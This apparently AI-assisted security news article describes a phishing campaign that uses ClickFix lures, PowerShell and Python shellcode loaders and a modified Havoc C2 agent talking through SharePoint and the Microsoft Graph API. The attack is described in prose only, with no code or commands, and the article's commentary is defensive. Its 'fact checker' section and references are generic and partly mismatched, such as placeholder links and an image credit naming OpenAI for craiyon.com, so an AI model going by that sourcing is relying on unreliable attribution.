Sophisticated Phishing Attack Uses Havoc C2 Framework and Microsoft Graph API

By /

Listen to this Post

A new phishing campaign has been uncovered, utilizing the open-source Havoc command-and-control (C2) framework to target organizations. This multi-stage attack is designed to bypass traditional security measures by embedding malicious activity within legitimate Microsoft services, such as SharePoint and the Microsoft Graph API. As attackers continue to refine their techniques, this campaign highlights the growing complexity of modern cyber threats.

the Attack

The phishing campaign begins with an email containing a seemingly innocuous HTML attachment named ā€œDocuments.html.ā€ This file leverages a social engineering technique called ClickFix, deceiving users into executing a PowerShell command. Once activated, the script downloads a remote PowerShell script from a SharePoint-hosted URL. The script first checks the environment for sandbox indicators and adjusts system settings to establish infection markers.

If the system lacks a Python interpreter, the script installs one before executing a hidden Python shellcode loader. This loader contains Russian-language debug messages and enables attackers to execute shellcode in memory, ensuring persistence. The attackers also use a GitHub-hosted shellcode loader called KaynLdr to obscure the malwareā€™s execution.

A key feature of this attack is the use of the Microsoft Graph API and SharePoint. The attackers modify the Havoc Demon Agent to communicate with their C2 server through these services, embedding malicious activity in seemingly legitimate SharePoint operations. Two files are created in the SharePoint document library, designed for exfiltrating data and receiving commands from the C2 server. These files communicate with AES-256 encryption, adding an extra layer of obfuscation.

What Undercode Says:

This phishing campaign showcases an alarming trend where cybercriminals are leveraging open-source tools, such as the Havoc C2 framework, in combination with established services like Microsoft Graph API. By using SharePoint as a communication channel, attackers manage to fly under the radar of traditional detection mechanisms. This method takes advantage of the trust inherent in Microsoft services, making it harder for security systems to differentiate between legitimate and malicious traffic.

The key to this attack lies in its sophistication. The attackers deploy a multi-stage infection process that begins with a simple phishing email but quickly escalates into a fully-fledged malware campaign. Through clever use of PowerShell, Python, and the Microsoft Graph API, they are able to maintain persistence, steal data, and issue commands remotely. By hiding their activity within trusted services, the attackers reduce the likelihood of detection.

One of the most striking aspects of this campaign is its use of the ClickFix social engineering technique. This tactic is particularly effective because it relies on human error, with users unknowingly executing the malicious PowerShell script. This highlights the importance of employee training in recognizing phishing attempts and malicious attachments.

The use of encrypted communication and the manipulation of registry entries further complicate detection efforts, making it difficult for conventional security tools to identify the attackā€™s presence until itā€™s too late. This underscores the growing need for advanced threat detection systems that are capable of recognizing sophisticated C2 traffic and monitoring for unusual activity across platforms like SharePoint.

Furthermore, the attackersā€™ ability to conceal their malicious activity within Microsoftā€™s legitimate services demonstrates how threat actors continue to evolve their methods. This attack is not only a wake-up call for organizations to adopt better security practices but also a reminder of the ever-evolving landscape of cyber threats.

Fact Checker Results

  • Legitimate Sources Used: The use of Microsoft Graph API and SharePoint is accurate, as both are widely used services that can be exploited for malicious purposes.
  • Phishing Technique: The ClickFix method described is a known social engineering tactic used to trick users into executing malicious scripts.
  • Encryption and Obfuscation: AES-256 encryption and the use of tools like KaynLdr are consistent with known techniques for hiding malicious activity in advanced attacks.

References:

Reported By: https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/
Extra Source Hub:
https://www.twitter.com
Wikipedia: https://www.wikipedia.org
Undercode AI

Image Source:

OpenAI: https://craiyon.com
Undercode AI DI v2Featured Image

Explore More: